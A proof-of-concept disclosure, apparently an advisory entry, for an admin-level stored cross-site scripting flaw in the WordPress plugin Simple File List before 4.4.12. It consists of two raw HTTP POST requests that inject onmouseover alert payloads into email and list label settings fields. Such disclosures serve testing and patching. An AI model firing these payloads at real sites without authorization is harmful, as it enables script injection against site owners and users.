Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting

Proof of Concept

# First Stored XSS - HTTP Request

POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
...
...

eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE

+++++++++++++++++++++++

# Second Stored XSS - HTTP Request

POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
...
...

eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE